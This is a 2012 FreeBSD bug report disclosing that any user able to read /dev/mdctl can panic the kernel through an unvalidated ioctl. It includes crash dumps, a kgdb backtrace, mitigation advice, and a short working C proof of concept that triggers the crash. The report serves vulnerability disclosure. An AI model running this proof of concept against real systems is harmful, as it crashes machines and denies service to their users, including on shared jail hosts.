misc/169683: System crash via ioctl() on mdctl.

Filip Palian filip.palian at pjwstk.edu.pl
Fri Jul 6 16:40:04 UTC 2012 

>Number:         169683
>Category:       misc
>Synopsis:       System crash via ioctl() on mdctl.
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    freebsd-bugs
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Fri Jul 06 16:40:03 UTC 2012
>Closed-Date:
>Last-Modified:
>Originator:     Filip Palian
>Release:        FreeBSD 9.0-RELEASE #0
>Organization:
>Environment:
FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012 root at obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386
>Description:
User who has read permission on "/dev/mdctl" is able to crash the system (also within the jail if only provided by devfs(.rules)) via ioctl() handler in "/usr/src/sys/dev/md/md.c:1127". The crash occures in function bcopy() (md.c:491) called in mdstart_preload() (md.c:493). Some detailed information included below.

-- cut --
fbsd dumped core - see /var/crash/vmcore.0
..
panic: page fault
..
Unread portion of the kernel message buffer:

Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 00
fault virtual address   = 0xd550ba7a
fault code              = supervisor read, page not present
instruction pointer     = 0x20:0xc0d46bfe
stack pointer           = 0x28:0xd8e13ca0
frame pointer           = 0x28:0xd8e13cbc
code segment            = base 0x0, limit 0xfffff, type 0x1b
                        = DPL 0, pres 1, def32 1, gran 1
processor eflags        = interrupt enabled, resume, IOPL = 0
current process         = 3154 (md671657984)
trap number             = 12
panic: page fault
cpuid = 0
KDB: stack backtrace:
#0 0xc0a4b157 at kdb_backtrace+0x47
#1 0xc0a186b7 at panic+0x117
#2 0xc0d48cf3 at trap_fatal+0x323
#3 0xc0d48fa0 at trap_pfault+0x2a0
#4 0xc0d49b35 at trap+0x465
#5 0xc0d32a8c at calltrap+0x6
#6 0xc0731b12 at md_kthread+0x232
#7 0xc09ea997 at fork_exit+0x97
#8 0xc0d32b04 at fork_trampoline+0x8
Uptime: 9h48m43s
Physical memory: 1007 MB
Dumping 108 MB: 93 77 61 45 29 13

--

# nm -n /usr/obj/usr/src/sys/GENERIC/kernel.debug |grep c0d46b
c0d46b28 T bzero
c0d46b44 T sse2_pagezero
c0d46b64 T i686_pagezero
c0d46ba4 T fillw
c0d46bb8 T bcopyb
c0d46be4 T bcopy        <--- paniced here on $esi (0xd550ba7a)

--

(kgdb) bt
#0  doadump (textdump=1) at pcpu.h:244
#1  0xc0a1845a in kern_reboot (howto=260) at /usr/src/sys/kern/kern_shutdown.c:442
#2  0xc0a186f1 in panic (fmt=Variable "fmt" is not available.
) at /usr/src/sys/kern/kern_shutdown.c:607
#3  0xc0d48cf3 in trap_fatal (frame=0xd8e13c60, eva=3578837626) at /usr/src/sys/i386/i386/trap.c:975
#4  0xc0d48fa0 in trap_pfault (frame=0xd8e13c60, usermode=0, eva=3578837626) at /usr/src/sys/i386/i386/trap.c:888
#5  0xc0d49b35 in trap (frame=0xd8e13c60) at /usr/src/sys/i386/i386/trap.c:558
#6  0xc0d32a8c in calltrap () at /usr/src/sys/i386/i386/exception.s:168
#7  0xc0d46bfe in bcopy () at /usr/src/sys/i386/i386/support.s:196
Previous frame inner to this frame (corrupt stack?)
-- cut --
>How-To-Repeat:
Compile and execute the code from the attachment.
>Fix:
Validate input data from user to xmdctlioctl() in ""/usr/src/sys/dev/md/md.c".

To prevent evil users from doing bad things administrators should ensure, that "/dev/mdctl" permissions are +rw (600) only for root.

For servers where jails are provided for untrusted users (e.g. hosting companies) access to "/dev/mdctl" device should be forbidden/hidden using defvs.rules.

Patch attached with submission follows:

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mdioctl.h>


int main()
{
	int f;
	struct md_ioctl s;
	struct stat ss;

	s.md_version = MDIOVERSION;
	//s.md_type = MD_PRELOAD;
	s.md_type = MD_MALLOC;
	/* this one becomes sc->pl_ptr */
	s.md_base = 0x41414141-0x200;

	if (stat("/dev/mdctl", &ss) != 0) {
		printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno));
		exit (0);
	}

	f = open("/dev/mdctl", O_RDONLY, 0);

	printf("say goodnight...\n");

	if (ioctl(f, MDIOCATTACH, &s) < 0)
	      	printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno));

	printf("no +r no fun\n");

	exit (0);
}


>Release-Note:
>Audit-Trail:
>Unformatted:

More information about the freebsd-bugs mailing list